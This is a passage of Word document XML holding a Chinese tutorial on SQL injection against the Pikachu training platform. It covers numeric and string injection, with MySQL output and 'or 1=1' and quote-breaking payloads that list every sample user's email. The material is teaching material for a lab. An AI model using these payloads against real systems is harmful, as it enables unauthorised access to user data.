        <w:t>很多时候检测提交包含引号的链接时，会提示非法字符，或者直接不返回任何信息，但这并不等于不存在SQL注入漏洞。此时可使用经典的“1=1和1=2”法进行检测。方法很简单，就是直接在链接地址后分别加上and 1=1和and 1=2进行提交，如果返回不同的页面，那么说明存在SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EECA408" w14:textId="77777777" w:rsidR="00236C39" w:rsidRPr="00DD695F" w:rsidRDefault="00236C39" w:rsidP="00236C39">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD695F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575DB2E0" w14:textId="77777777" w:rsidR="00236C39" w:rsidRPr="009E7F7C" w:rsidRDefault="00236C39" w:rsidP="00236C39">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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>数字型注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A431D6" w14:textId="77777777" w:rsidR="00B24885" w:rsidRPr="006F519C" w:rsidRDefault="006F519C" w:rsidP="00236C39">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F519C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>登录测试环境观察如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7618BF3F"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b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F519C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>mysql&gt; show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6DD24B"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46294B35"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Database           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3937006E"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0E183D14"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information_schema |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EBD5D2"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bwapp              |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C76C3EA"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mysql              |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346ADB1"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performance_schema |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3982364B"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pikachu            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5369B0AA"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test               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AB464C"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test1              |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB49198"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13427912"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7 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782B5CF6"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p>
    <w:p w14:paraId="329A36C3"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b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F519C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>mysql&gt; use pikachu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133B82C"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Database changed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D47F4"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mysql&gt; show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E188F"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2F70F347"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Tables_in_pikachu |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B31AFA8"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5C2C70BC"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httpinfo          |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEDB8AF"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member            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD2E9FD"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message           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6775A3"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users             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F18C92E"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xssblind          |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EAB0D1"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1A8E2A3B"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5 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF6C6EA"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p>
    <w:p w14:paraId="4839E2AA"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b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F519C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>mysql&gt; desc member;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="006F519C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>查看member这个表的字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB95D8F"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354733EE"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Field    | Type             | Null | Key | Default | Extra          |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A00A68"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21BBDC33"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id       | int(10) unsigned | NO   | PRI | NULL    | auto_increment |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB4EA5"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username | varchar(66)      | NO   |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A04D9AC"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pw       | varchar(128)     | NO   |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F6B22"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sex      | char(10)         | NO   |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5DD46A"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phonenum | varchar(255)     | NO   |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AAB0E9"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address  | varchar(255)     | NO   |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5451C2A5"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 email    | varchar(255)     | NO   |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA51246" w14:textId="77777777" w:rsidR="006F519C" w:rsidRPr="006F519C" w:rsidRDefault="006F519C" w:rsidP="006F519C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABAFB91" w14:textId="77777777" w:rsidR="006F519C" w:rsidRDefault="006F519C" w:rsidP="006F519C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F519C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>7 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5251D858"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b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E14A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>mysql&gt; select username,email from member where id=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E58CAD"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0952811F"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username | email             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30458C"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7FE8EA0A"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vince    | vince@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25678E33"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10C70B14"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1 row in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F00BBDB"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p>
    <w:p w14:paraId="1A33A63D"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b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E14A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>mysql&gt; select username,email from member where id=1 or 1=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7D384B"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40E56FAF"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username | email             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA6FA1"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6E995245"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vince    | vince@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF618A8"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allen    | allen@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1C949D"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kobe     | kobe@pikachu.com  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497E0BA0"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grady    | grady@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0390C2A2"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kevin    | kevin@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63877B98"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lucy     | lucy@pikachu.com  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D5FA4"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 lili     | lili@pikachu.com  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336B0639" w14:textId="77777777" w:rsidR="006E14A3" w:rsidRPr="006E14A3" w:rsidRDefault="006E14A3" w:rsidP="006E14A3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDA84E9" w14:textId="77777777" w:rsidR="006E14A3" w:rsidRDefault="006E14A3" w:rsidP="006E14A3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E14A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>7 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929AE11" w14:textId="77777777" w:rsidR="006E14A3" w:rsidRDefault="006E14A3" w:rsidP="006E14A3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F07B0B2" w14:textId="77777777" w:rsidR="006E14A3" w:rsidRDefault="006E14A3" w:rsidP="006E14A3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>发现输入or 1=1</w:t>
      </w:r>
      <w:r w:rsidR="003B36A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>之后全部显示出来了，下面我们通过burp抓包</w:t>
      </w:r>
      <w:r w:rsidR="003B36A2" w:rsidRPr="003B36A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>输入一个</w:t>
      </w:r>
      <w:r w:rsidR="003B36A2" w:rsidRPr="003B36A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>or 1=1</w:t>
      </w:r>
      <w:r w:rsidR="003B36A2" w:rsidRPr="003B36A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>设置一个payload,点击提交后，在Render中查看结果。通过判断存在SQL注入，且为数字型注入，可以通过拼接SQL语句来实现注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75127381" w14:textId="77777777" w:rsidR="006E14A3" w:rsidRDefault="003B36A2" w:rsidP="006E14A3">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hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4633457D" wp14:editId="37FDB4A3">
            <wp:extent cx="5278120" cy="3382666"/>
            <wp:effectExtent l="1905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8120" cy="3382666"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE609B5" w14:textId="77777777" w:rsidR="00236C39" w:rsidRPr="009E7F7C" w:rsidRDefault="00236C39" w:rsidP="00236C3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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="0054502D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0054502D" w:rsidRPr="0054502D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>字符型注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F49AF" w14:textId="77777777" w:rsidR="00236C39" w:rsidRPr="001D6220" w:rsidRDefault="001D6220" w:rsidP="00236C39">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D6220">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>打开pikachu平台，在SQL-Inject下选择字符型注入。输入在之前我们已经知道的一个id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A8BC0" w14:textId="77777777" w:rsidR="001D6220" w:rsidRDefault="001D6220" w:rsidP="00236C39">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1B079E18" wp14:editId="0E48C022">
            <wp:extent cx="5278120" cy="2914270"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="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8120" cy="2914270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E20220A" w14:textId="77777777" w:rsidR="001D6220" w:rsidRDefault="001D6220" w:rsidP="00236C39">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们发现需要输入字符串来完成查询。按照之前的思路我们写一个查询语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">select id,email from member where username='vince' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C69294" w14:textId="77777777" w:rsidR="001D6220" w:rsidRPr="001D6220" w:rsidRDefault="001D6220" w:rsidP="001D6220">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="337" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D6220">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在这个基础上进行拼接来写一个”万能密码“，按照之前的构想，拼写一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001D6220">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:eastAsia="宋体" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>select id,email from member where username='vince</w:t>
      </w:r>
      <w:r w:rsidR="00460487">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:eastAsia="宋体" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="001D6220">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:eastAsia="宋体" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="001D6220">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> ；为了验证想法我们输入尝试以下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F21367"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b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D6220">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mysql&gt; select id,email from member where username='vince';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF35E0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C22BBF4"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 id | email             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B91307E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFE3C1A"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  1 | vince@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33545B55"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464093F6"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1 row in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679142B" w14:textId="77777777" w:rsidR="001D6220" w:rsidRPr="001D6220" w:rsidRDefault="001D6220" w:rsidP="001D6220">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D6220">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mysql&gt; select id,email from member where username='vince or 1=1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E077A41" w14:textId="77777777" w:rsid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sidRPr="001D6220">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Empty set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9F823" w14:textId="77777777" w:rsidR="001D6220" w:rsidRDefault="001D6220" w:rsidP="001D6220">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001D6220">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
